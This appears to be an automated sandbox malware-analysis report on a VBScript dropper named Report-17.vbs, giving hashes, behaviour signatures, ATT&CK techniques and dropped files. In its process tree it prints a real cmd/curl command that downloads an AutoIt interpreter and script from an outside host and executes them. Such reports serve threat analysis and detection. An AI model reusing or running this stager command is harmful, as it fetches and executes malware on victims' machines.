34760421aeab439d359bc824909299390fa0a419ab8ddfb7822a16c75d07e59f

Analysis

max time kernel
142s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
10/10/2023, 15:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Report-17.vbs
Size

16KB
MD5

902d4e9234583e12da2d0078d37f5a30
SHA1

7ced5e82455bc1afc788ebf13170f76a219edea2
SHA256

5c084328ab45eb579d31c3157b0f486cbfea6ca0dfd89dda2084ace5745b9549
SHA512

8a0e61e9d3110de4aa10c63b60dd0ace4b3725915c3e20d225986f94c30bd4fe181e94bb21d2771c458b256bdea2028a24f4d6e56c012d46da6032175810c1da
SSDEEP

384:SzE0ig4KR/aQsKsWMnkf+cTPgKekvj27vmJYs:AJHsXkfNEKekvq7eJz

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	3716	WScript.exe
7	3716	WScript.exe
9	3716	WScript.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
1568	Autoit3.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Autoit3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Autoit3.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeManageVolumePrivilege	420	svchost.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 3716 wrote to memory of 3496	3716	WScript.exe	83
PID 3716 wrote to memory of 3496	3716	WScript.exe	83
PID 3496 wrote to memory of 3808	3496	cmd.exe	85
PID 3496 wrote to memory of 3808	3496	cmd.exe	85
PID 3496 wrote to memory of 4352	3496	cmd.exe	88
PID 3496 wrote to memory of 4352	3496	cmd.exe	88
PID 3496 wrote to memory of 1568	3496	cmd.exe	89
PID 3496 wrote to memory of 1568	3496	cmd.exe	89
PID 3496 wrote to memory of 1568	3496	cmd.exe	89

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Report-17.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3716
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cd /d %temp% & curl -o Autoit3.exe http://prestige-castom.com:2351 & curl -o ymehvz.au3 http://prestige-castom.com:2351/msirzgnzamg & Autoit3.exe ymehvz.au3
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3496
- - C:\Windows\system32\curl.exe
    curl -o Autoit3.exe http://prestige-castom.com:2351
    3⤵
    PID:3808
- - C:\Windows\system32\curl.exe
    curl -o ymehvz.au3 http://prestige-castom.com:2351/msirzgnzamg
    3⤵
    PID:4352
- - C:\Users\Admin\AppData\Local\Temp\Autoit3.exe
    Autoit3.exe ymehvz.au3
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    PID:1568

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
PID:3680

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:420

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Autoit3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ymehvz.au3

Filesize
102KB

MD5
151711041ee1619088258f05a5d3bd5b

SHA1
d2047aaf530ce0db076ea7cc7e548fd5a35cee55

SHA256
ead5d943a69f2d8641612415c77ad26daa6d53e1c6ea0270a91d3121eafd943d

SHA512
1085c381dc8f97353bed29e96a10a2e8ba4a6df761c2af56f9cced5cc6b49c80c388e280a2d53b09e20b4e19f1bdcc813d687d52f7f31679f6ee1c84c23037a1

Download Submit
C:\temp\gqcsfd

Filesize
388KB

MD5
1ddcfa52d781f75190c18c48e9645b63

SHA1
e2976a957580fde87caa6dd615e01a574292b564

SHA256
1f77719d1f2ffee980d89e74904859e7d098ac1f7d1d09a0e406b1a4a1f8e23c

SHA512
7882772319b3a801b72ebfad7674c35f43261f9f7aa0b163e49da0d898090ca1380db5b209b6263889a1180c68bd75ac6d53fb0fbaeebfca96f167f51a607afb

Download Submit
memory/420-27-0x000001E77FA50000-0x000001E77FA60000-memory.dmp

Filesize
64KB

Download
memory/420-43-0x000001E77FB50000-0x000001E77FB60000-memory.dmp

Filesize
64KB

Download
memory/420-59-0x000001E77FEC0000-0x000001E77FEC1000-memory.dmp

Filesize
4KB

Download
memory/420-61-0x000001E77FEF0000-0x000001E77FEF1000-memory.dmp

Filesize
4KB

Download
memory/420-63-0x000001E708000000-0x000001E708001000-memory.dmp

Filesize
4KB

Download
memory/420-62-0x000001E77FEF0000-0x000001E77FEF1000-memory.dmp

Filesize
4KB

Download
memory/1568-18-0x0000000000F30000-0x0000000001330000-memory.dmp

Filesize
4.0MB

Download
memory/1568-25-0x0000000005100000-0x00000000052E9000-memory.dmp

Filesize
1.9MB

Download
memory/1568-26-0x0000000005100000-0x00000000052E9000-memory.dmp

Filesize
1.9MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads